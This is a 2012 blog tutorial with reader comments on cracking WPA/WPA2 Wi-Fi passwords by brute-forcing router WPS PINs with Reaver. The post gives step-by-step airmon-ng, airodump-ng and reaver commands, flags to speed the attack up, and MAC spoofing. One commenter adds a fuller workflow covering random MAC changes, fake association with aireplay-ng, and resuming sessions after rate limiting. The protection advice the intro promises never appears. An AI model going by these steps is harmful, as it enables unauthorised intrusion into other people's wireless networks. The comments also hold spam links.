Saturday, December 29, 2012

How to Crack a Wi-Fi Network’s WPA Password with Reaver

A new, free, open-source tool called Reaver exploits a security hole in wireless routers and can crack most routers' current passwords with relative ease. Here's how to crack a WPA or WPA2 password, step by step, with Reaver—and how to protect your network against Reaver attacks.

On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

What You'll Need
#A PC running Linux.
#A computer with Wi-Fi

Run the following commands(# Bold) in the terminal.(without #)

Step 1: Install Airmon-ng Suite from my previous post.

Step 2: Install Reaver from my previous post.

Step 3: To get root privileges, in terminal type:

# sudo -s

Step 4: Find your wireless card.Inside terminal type:


# iwconfig

Step 5: Put your wireless card into monitor mode.Assuming your wireless card's interface name is wlan0, execute the following command to put your wireless card into monitor mode:

# airmon-ng start wlan0

Step 6: In terminal type:

# airodump-ng mon0

It will display a list of wireless networks in range. When you see the network you want to crack, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (MAC address of the targeted network). The network should have WPA or WPA2 listed under the ENC column.

Step 7: Now we start cracking password with Reaver. 

# reaver -i moninterface -b bssid -vv

For example, if your monitor interface was mon0 like mine, and your BSSID was 7F:AC:6B:MB:1F:B2 (a BSSID I just made up), your command would look like:

# reaver -i mon0 -b 7F:AC:6B:MB:1F:B2 -vv

Now sit back and relax as Reaver will now try a series of PINs on the router in a brute force attack. The Reaver documentation says it can take between 4 and 10 hours.

Speeding Up the Attack

By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:


# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

MAC Spoofing

In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

If you encounter any problem you can post a comment below or visit Reaver website

43 comments:

  1. its just repeating
    [+] Switching mon0 to channel 14
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 7
    [+] Switching mon0 to channel 8
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 10
    [+] Switching mon0 to channel 11
    [+] Switching mon0 to channel 12
    [+] Switching mon0 to channel 13
    [+] Switching mon0 to channel 14

    kindly help. Mine is ubuntu 12.04

    ReplyDelete
    Replies
    1. you should turn-on your monitor interface... then lock the channel by typing airodump-ng (monitor interface) -c (channel) before executing reaver.

      Delete
    2. I have tried this
      airodump-ng mon0 -c 1 // 1 for channel 1
      but still it keeps on changing the channels.
      please reply asap

      Delete
    3. I have the same problem, it keeps on changing the channels. i tried airodump-ng mon0 -c 1 but didn't helped. Kindly help me to overcome this issue.
      Regards

      Delete
    4. You need to lock the channel for reaver, not airodump-ng. The -c switch works for reaver as well (eg -c 6). Use the channel number reported by airodump for the target BSSID.

      Delete
  2. root@ceaser:~/aircrack-ng-1.1/reaver-1.4/src# airmon-ng start wlan0


    Found 5 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    938 NetworkManager
    948 avahi-daemon
    949 avahi-daemon
    2496 wpa_supplicant
    3466 dhclient


    Interface Chipset Driver

    eth1 Unknown wl - [phy0]

    root@ceaser:~/aircrack-ng-1.1/reaver-1.4/src# airodump-ng mon0
    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device
    root@ceaser:~/aircrack-ng-1.1/reaver-1.4/src# reaver -i moninterface -b bssid -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [-] Failed to retrieve a MAC address for interface 'moninterface'!
    root@ceaser:~/aircrack-ng-1.1/reaver-1.4/src# reaver -i moninterface -b bssid -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [-] Failed to retrieve a MAC address for interface 'moninterface'!
    root@ceaser:~/aircrack-ng-1.1/reaver-1.4/src#

    ReplyDelete
    Replies
    1. you should type airmon-ng start eth1 because your machine doesn't have wlan0 interface, then execute the command airodump-ng mon0

      Delete
    2. I used wlan0mon for my machine but i got later into some AP rate limiting... how do i get past that?? Im very new to this.. like 10 h new))

      Delete
  3. i get the error above when i try to start the attack service above

    ReplyDelete
  4. ubuntu went to text console 10 sec after I typed in iwconfig. Panic occurred my ass-

    ReplyDelete
  5. after i type airodump-ng start wlan0

    Found 5 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    426 avahi-daemon
    427 avahi-daemon
    465 NetworkManager
    554 wpa_supplicant
    2526 dhclient
    Process with PID 2526 (dhclient) is running on interface wlan0


    Interface Chipset Driver

    wlan0 Atheros ath5k - [phy0]

    ERROR: Neither the sysfs interface links nor the iw command is available.
    Please download and install iw from
    http://wireless.kernel.org/download/iw/iw-0.9.19.tar.bz2
    this happens and when i go to the given site the site does not exists

    ReplyDelete
    Replies
    1. I had the same problem! What I did was download "Synaptic Package Manager" from the "Ubuntu Software Center", and once in that program, I looked for "iw" and told it to install that! It seems to be working now! :)

      Delete
    2. Above comment worked for me as well. Nice one!

      Delete
    3. correct! it's working

      Delete
  6. Found 5 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    1491 avahi-daemon
    1492 avahi-daemon
    1938 NetworkManager
    1956 wpa_supplicant
    3568 dhclient
    Process with PID 3568 (dhclient) is running on interface wlan0


    Interface Chipset Driver

    wlan0 Atheros ath9k - [phy0]

    ERROR: Neither the sysfs interface links nor the iw command is available.
    Please download and install iw from
    http://wireless.kernel.org/download/iw/iw-0.9.19.tar.bz2


    root@ubuntu:~# airodump-ng mon0
    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device
    root@ubuntu:~#

    ReplyDelete
  7. it says
    [!] WARNING: Failed to associate with 00:25:9C:0C:56:BE (ESSID: adamwdji)
    [!] WARNING: Failed to associate with 00:25:9C:0C:56:BE (ESSID: adamwdji)
    [!] WARNING: Failed to associate with 00:25:9C:0C:56:BE (ESSID: adamwdji)
    [!] WARNING: Failed to associate with 00:25:9C:0C:56:BE (ESSID: adamwdji)
    [!] WARNING: Failed to associate with 00:25:9C:0C:56:BE (ESSID: adamwdji)
    what shall i do???.

    ReplyDelete
    Replies
    1. same problem here. what shalld we do ,

      Delete
    2. same problem and here.Any help ?

      Delete
    3. same here !!!!

      Delete
    4. Same here!!! iam new to reaver or kali linux but had crack wifi through wpa handshake dictionary attack.since Reaver was seem to fast,so was trying reaver with kali linux but got stuck at above interface and my is eth1 not wlan0.

      Delete
  8. This comment has been removed by the author.

    ReplyDelete
  9. I just get this. and it looks like it starts over with the same pin/

    WPS transaction failed (code: 0x02), re-trying last pin

    ReplyDelete
  10. After running the final command I get this

    [+] Waiting for beacon from 00:1F:90:CC:7D:B0
    [+] Switching mon0 to channel 1
    [+] Associated with 00:1F:90:CC:7D:B0 (ESSID: ZWT75)

    Should I be good to just wait now?

    ReplyDelete
  11. alexandros@alexandros-HP-Compaq-dx2400-Microtower-PC:~$ sudo -s
    [sudo] password for alexandros:
    root@alexandros-HP-Compaq-dx2400-Microtower-PC:~# iwconfig
    wlan0 IEEE 802.11bgn ESSID:off/any
    Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
    Retry long limit:7 RTS thr:off Fragment thr:off
    Encryption key:off
    Power Management:off

    lo no wireless extensions.

    mon0 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
    Retry long limit:7 RTS thr:off Fragment thr:off
    Power Management:off

    mon1 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
    Retry long limit:7 RTS thr:off Fragment thr:off
    Power Management:off

    mon2 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
    Retry long limit:7 RTS thr:off Fragment thr:off
    Power Management:off

    eth0 no wireless extensions.

    root@alexandros-HP-Compaq-dx2400-Microtower-PC:~# airmon-ng start wlan0


    Found 4 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    867 avahi-daemon
    868 avahi-daemon
    911 NetworkManager
    1067 wpa_supplicant


    Interface Chipset Driver

    wlan0 Atheros ath9k - [phy0]
    (monitor mode enabled on mon3)
    mon0 Atheros ath9k - [phy0]
    mon1 Atheros ath9k - [phy0]
    mon2 Atheros ath9k - [phy0]

    root@alexandros-HP-Compaq-dx2400-Microtower-PC:~# airodump-ng mon3



























    CH -1 ][ Elapsed: 8 s ][ 2014-04-04 17:42

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    FC:75:16:85:14:B6 -1 0 4 0 133 -1 OPN
    00:15:56:B5:04:13 -58 76 0 0 6 54 . WPA TKIP PSK OTE8592
    54:E6:FC:CD:BA:FA -73 10 2 0 4 54 . WPA2 CCMP PSK homelink
    5C:D9:98:BB:BA:86 -89 86 37 0 6 54e WPA2 CCMP PSK Stefanatos

    BSSID STATION PWR Rate Lost Packets Probes

    FC:75:16:85:14:B6 E8:4E:06:05:50:F2 -92 0 - 1 33 10
    54:E6:FC:CD:BA:FA F8:D1:11:B3:61:21 -1 36 - 0 0 2
    5C:D9:98:BB:BA:86 00:D5:24:46:C6:08 -91 0e- 5e 0 39

    root@alexandros-HP-Compaq-dx2400-Microtower-PC:~# reaver -i mon3 -b 00:15:56:B5:04:13 -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 00:15:56:B5:04:13
    [+] Switching mon3 to channel 6
    [!] WARNING: Failed to associate with 00:15:56:B5:04:13 (ESSID: OTE8592)
    [!] WARNING: Failed to associate with 00:15:56:B5:04:13 (ESSID: OTE8592)
    [!] WARNING: Failed to associate with 00:15:56:B5:04:13 (ESSID: OTE8592)
    [!] WARNING: Failed to associate with 00:15:56:B5:04:13 (ESSID: OTE8592)
    [!] WARNING: Failed to associate with 00:15:56:B5:04:13 (ESSID: OTE8592)
    [!] WARNING: Failed to associate with 00:15:56:B5:04:13 (ESSID: OTE8592)
    what should i do?

    ReplyDelete
  12. Hi, just my way of running reaver.

    What I do is:

    1. Use a live usb drive with Back Track 5, Press into your usb port.

    2. Start up your computer, as soon as you see the logo press F12 on mine yours might be F9 or something different.
    This is where you select a different boot method, so select your usb thumb drive, not your hard drive.

    3. On my Back Track Live Usb when booting it up you select the default option and press enter, then it runs a fews lines of code and stops, this is when I hit the space bar and it will continue loading code then Ubuntu logo 10.10 then runs more code till it stops at a command prompt again, here you type: startx and press enter. Now wait until the operating system completes.

    4, Now single click second icon on the bottom left which is Konsole Terminal (command Prompt). Type: airmon-ng and press enter, this will show your interface usually wlan0 ( the 0 at the end is a zero or 1 etc,,,)
    Now type: airmon-ng start wlan0
    This puts your interface in monitor mode.
    Now type: killall -9 dhclient3 and press enter.

    5. Now to spoof mac address:

    Type: ifconfig wlan0 down and press enter.

    ifconfig mon0 down and press enter

    macchanger -r wlan0 and press enter ( the -r gives you a new random mac address)

    Now you have changed your wlan0 interface mac address, but now we are going to change the mon0 interface to the same mac address as the wlan0 mac address so type: macchanger -m 00:00:00:00:00:00 mon0 and press enter. ( the 00:00:00:00:00:00 is the mac which you type in from the wlan0 mac change)

    Now both your mac addresses should be the same, good, always match the two macs and you will have less troubles.

    6. Type: ifconfig wlan0 up and press enter.


    ifconfig mon0 up and press enter.


    Now type: clear and press enter to use same terminal window.

    7. Type: wash -i mon0 -C ( -C is capital which stops Bad FCS Skipping problems) let it scan till you find the ESSID you like which says "No" in the WPS Locked column, then press Ctrl and c keys together to stop scanning.
    Now double left click in front of BSSID mac address that you want, on the second click hold it down and drag to highlight the mac address then release and right click and select copy. Also remember the channel number from the Channel column.

    Now type: clear and press enter


    8. Type: airodump-ng mon0 and press enter. and let it scan for a while, double check that your BSSID is on the number that you are remembering if not then you need to remember the new channel number. Now if everything is good press Ctrl and c keys to stop scanning. Now type: clear and press enter.


    9. Now you are ready type airodump-ng -c (your channel number lets says 6) mon0 So it would be:

    airmon-ng -c 6 mon0 Now leave that terminal running. This sets your interface on the proper channel.

    10. Open a new terminal second icon in at left bottom of desktop.
    Type: aireplay-ng -1 33333333 -a 00:00:00:00:00:00 mon0 ( the 33333333 can only be 8 3's long and the 00:00:00:00:00:00 is the BSSID you copyed so after the -a then space right click and select paste)

    Now as it runs you watch for acks in brackets and association successful [AID] then sending keep-alive packet [ack] then that's good, if you are getting (Open System) then you are too far away from the selected access point.


    Now start reaver, type: reaver -i mon0 -A -N -b 00:00:00:00:00:00 -vv ( -A and -N are capital 00:00:00:00:00:00 is your BSSID selected just right click and paste as before).


    11. now I move my computer around till I get M3's and M4's completing on the reaver terminal and movement on the aireplay-ng terminal.


    Also if you use just the -v instead of -vv at the end of the the reaver command you only see the pin numbers tried instead of all the pin attempts


    Well that's just what I do, so have fun.

    ReplyDelete
  13. Also while in Back Track 5 single left click the 4th icon at the bottom left of the desktop which is Dolphin file manager. select root in left column then select usr/local/etc/reaver in the main window. Now after you have at least one pin change in reaver it creates a file in this location to save the session in. so this would be 000000000000.wpc (000000000000 would be the BSSID tou selected). So if you save this file to a separate jump drive (not your live Back Track drive). then you save your session, so next time if you get rate limited you can wait till another time and just paste that file into the same folder again. when you start reaver again it will ask if you want to resume that session type y for yes and enter. As reaver works it updates that file, so just copy and paste the new updated file to your jump drive again.

    ReplyDelete
  14. I am getting this error "mon0 is not a network interface". Plse help me.

    ReplyDelete
  15. Hi, I have one question, I have done access point mapping using airodump-ng, so i have collected so many aps, with different encryption some of are open aps. Is there any tools or web services are available for visualization ?
    I found this website http://bit.ly/1Nbfgm6 but is there any other sources are available ?

    Thanks!

    ReplyDelete
  16. Reaver has been running for 3 days... now says No space left on device what to do or just let it keep running??????

    ReplyDelete
  17. Reaver always use same pin 12345670 when cracking

    [+] Waiting for beacon from 00:1E:2A:03:41:92
    [+] Switching mon0 to channel 1
    [+] Associated with 00:1E:2A:03:41:92 (ESSID: kacperek)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    ^C
    [+] Nothing done, nothing to save.

    Help please

    ReplyDelete
  18. root@raspberrypi:~# iwconfig
    wlan0 unassociated Nickname:""
    Mode:Managed Frequency=2.412 GHz Access Point: Not-Associated
    Sensitivity:0/0
    Retry:off RTS thr:off Fragment thr:off
    Encryption key:off
    Power Management:off
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    lo no wireless extensions.

    eth0 no wireless extensions.

    root@raspberrypi:~# airmon-ng start wlan0


    Found 6 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    1667 ifplugd
    1677 ifplugd
    1699 ifplugd
    1741 wpa_supplicant
    1785 wpa_cli
    2005 dhclient


    Interface Chipset Driver


    root@raspberrypi:~# airodump-ng mon0
    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device
    root@raspberrypi:~# airmon-ng start eth1


    Found 6 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    1667 ifplugd
    1677 ifplugd
    1699 ifplugd
    1741 wpa_supplicant
    1785 wpa_cli
    2005 dhclient


    Interface Chipset Driver


    root@raspberrypi:~# airodump-ng mon0
    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device
    root@raspberrypi:~# airodump-ng mon0

    Help, please :D

    ReplyDelete
  19. i get like this whats the soloution
    root@hani:~# airodump-ng mon0
    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device
    root@hani:~# airodump-ng mon0

    ReplyDelete
  20. i am using kali linux 2016.1 when type reaver command it shows failed to retrieve mac address for wlan0

    ReplyDelete
  21. I really like reading through a post that can make people think. Also, many thanks for permitting me to comment!
    Full Hd drama


    Araw Gabi

    Home Sweetie Hd

    ReplyDelete